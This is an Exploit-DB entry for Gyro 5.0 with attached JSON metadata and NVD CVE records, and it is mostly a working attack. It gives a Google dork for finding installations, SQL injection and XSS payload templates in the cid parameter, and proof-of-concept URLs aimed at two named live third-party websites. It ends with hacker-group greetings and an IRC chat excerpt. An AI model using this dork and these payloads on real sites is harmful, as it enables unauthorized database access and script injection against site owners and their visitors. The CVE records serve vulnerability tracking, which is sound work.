ID EDB-ID:9640Type exploitdbReporter OoN_BoyModified 2009-09-11T00:00:00
Description
Gyro 5.0 (SQL/XSS) Multiple Remote Vulnerabilities. CVE-2009-3348,CVE-2009-3349. Webapps exploit for php platform
[+]=================================================================[+]
____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||A |||n |||t |||i |||S |||c |||e |||r |||u |||t |||i |||y ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
------------------------------------------------------------
http://antisecurity.org
[+]=================================================================[+]
[x]Title : Gyro V5.0 [Sql/Xss] Multiple Remote Vulnerabilities
[x]Software : Gyro V5.0
[x]Vendor : http://www.datavore.com
[x]Date : 11 September 2009 ( Indonesia )
[x]Author : OoN_Boy
[x]Contact : oon.boy9@gmail.com
[x]Blog : http://oonboy.blogspot.com
[x]Website : http://oonboy.info
[+]=================================================================[+]
[x] Google Dork
"powered by Gyro V5.0"
[+]=================================================================[+]
[x] Exploit
http://localhost/home?op=cat&cid=[sql]
http://localhost/home?op=cat&cid=[Xss]
[x] Proof of concept
http://www.vansda.ca/home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--
http://www.vansda.ca/home?op=cat&cid=29"><script>alert(123456)</script>
http://www.phpmath.com/home?op=cat&cid=29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.phpmath.com/home?op=cat&cid=29"><script>alert(123456)</script>
[+]=================================================================[+]
[x] Greetz
Antisecurity[dot]Org www.BatamHacker.or.id www.MainHack.com www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^
[+]=================================================================[+]
[x] Wew
[03:49] <&OoN_Boy> ============================
[03:49] <&OoN_Boy> [03:48] <&chawanua> mentang2 dah jadian ama si noge ..
[03:49] <&OoN_Boy> [03:48] <&Jack> xixixi
[03:49] <&OoN_Boy> [03:48] <&Jack> maap maap
[03:49] <&OoN_Boy> [03:48] <&Jack> :D
[03:49] <&OoN_Boy> [03:48] <&chawanua> si bob ko tinggalin
[03:49] <&OoN_Boy> [03:49] <&Jack> aq homo, begitu jg dirimu
[03:49] <&OoN_Boy> ============================
[+]=================================================================[+]
---------===Jangan Ngambek Jack ===---------
# milw0rm.com [2009-09-11]
{"published": "2009-09-11T00:00:00", "id": "EDB-ID:9640", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "77273229236d8b857e4b3870cd342e5ce1ecc1704578522627263e183cde9409", "description": "Gyro 5.0 (SQL/XSS) Multiple Remote Vulnerabilities. CVE-2009-3348,CVE-2009-3349. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/9640/", "lastseen": "2016-02-01T11:02:54", "edition": 1, "title": "gyro 5.0 sql/XSS Multiple Vulnerabilities", "osvdbidlist": ["58359", "58360"], "modified": "2009-09-11T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3349", "CVE-2009-3348"], "sourceHref": "https://www.exploit-db.com/download/9640/", "references": [], "reporter": "OoN_Boy", "sourceData": "[+]=================================================================[+]\n\t____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ \n\t||A |||n |||t |||i |||S |||c |||e |||r |||u |||t |||i |||y ||\n\t||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||\n\t|/__\\|/__\\|/__\\|/__\\|/__\\|/__\\|/__\\|/__\\|/__\\|/__\\|/__\\|/__\\|\n\t------------------------------------------------------------\n\t\t\t\thttp://antisecurity.org\n[+]=================================================================[+]\n\t\t[x]Title : Gyro V5.0 [Sql/Xss] Multiple Remote Vulnerabilities\n\t\t[x]Software : Gyro V5.0\n\t\t[x]Vendor : http://www.datavore.com\n\t\t[x]Date : 11 September 2009 ( Indonesia ) \n\t\t[x]Author : OoN_Boy\n\t\t[x]Contact : oon.boy9@gmail.com\n\t\t[x]Blog : http://oonboy.blogspot.com\n\t\t[x]Website\t: http://oonboy.info\n[+]=================================================================[+]\n\t\t[x] Google Dork\n\n\t\t\"powered by Gyro V5.0\"\n[+]=================================================================[+]\n\t\t[x] Exploit\n\t\thttp://localhost/home?op=cat&cid=[sql]\n\t\thttp://localhost/home?op=cat&cid=[Xss]\n\t\t\n\t\t[x] Proof of concept\n\t\thttp://www.vansda.ca/home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--\n\t\thttp://www.vansda.ca/home?op=cat&cid=29\"><script>alert(123456)</script>\n\t\thttp://www.phpmath.com/home?op=cat&cid=29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--\n\t\thttp://www.phpmath.com/home?op=cat&cid=29\"><script>alert(123456)</script>\n[+]=================================================================[+]\n [x] Greetz\n\n Antisecurity[dot]Org www.BatamHacker.or.id www.MainHack.com www.ServerIsDown.org - \n\t Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,\n\t zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia,\n\t str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^\n\n[+]=================================================================[+]\n\t [x] Wew\n\t\t[03:49] <&OoN_Boy> ============================\n\t\t[03:49] <&OoN_Boy> [03:48] <&chawanua> mentang2 dah jadian ama si noge ..\n\t\t[03:49] <&OoN_Boy> [03:48] <&Jack> xixixi\n\t\t[03:49] <&OoN_Boy> [03:48] <&Jack> maap maap\n\t\t[03:49] <&OoN_Boy> [03:48] <&Jack> :D\n\t\t[03:49] <&OoN_Boy> [03:48] <&chawanua> si bob ko tinggalin \n\t\t[03:49] <&OoN_Boy> [03:49] <&Jack> aq homo, begitu jg dirimu\n\t\t[03:49] <&OoN_Boy> ============================\n[+]=================================================================[+]\n ---------===Jangan Ngambek Jack ===---------\n\n# milw0rm.com [2009-09-11]\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2009-3349", "type": "cve", "title": "CVE-2009-3349", "description": "SQL injection vulnerability in Datavore Gyro 5.0 allows remote attackers to execute arbitrary SQL commands via the cid parameter in a cat action to the home component.", "published": "2009-09-24T12:30:01", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3349", "cvelist": ["CVE-2009-3349"], "lastseen": "2017-09-19T13:36:38"}, {"id": "CVE-2009-3348", "type": "cve", "title": "CVE-2009-3348", "description": "Cross-site scripting (XSS) vulnerability in Datavore Gyro 5.0 allows remote attackers to inject arbitrary web script or HTML via the cid parameter in a cat action to the home component.", "published": "2009-09-24T12:30:01", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3348", "cvelist": ["CVE-2009-3348"], "lastseen": "2017-09-19T13:36:38"}]}}
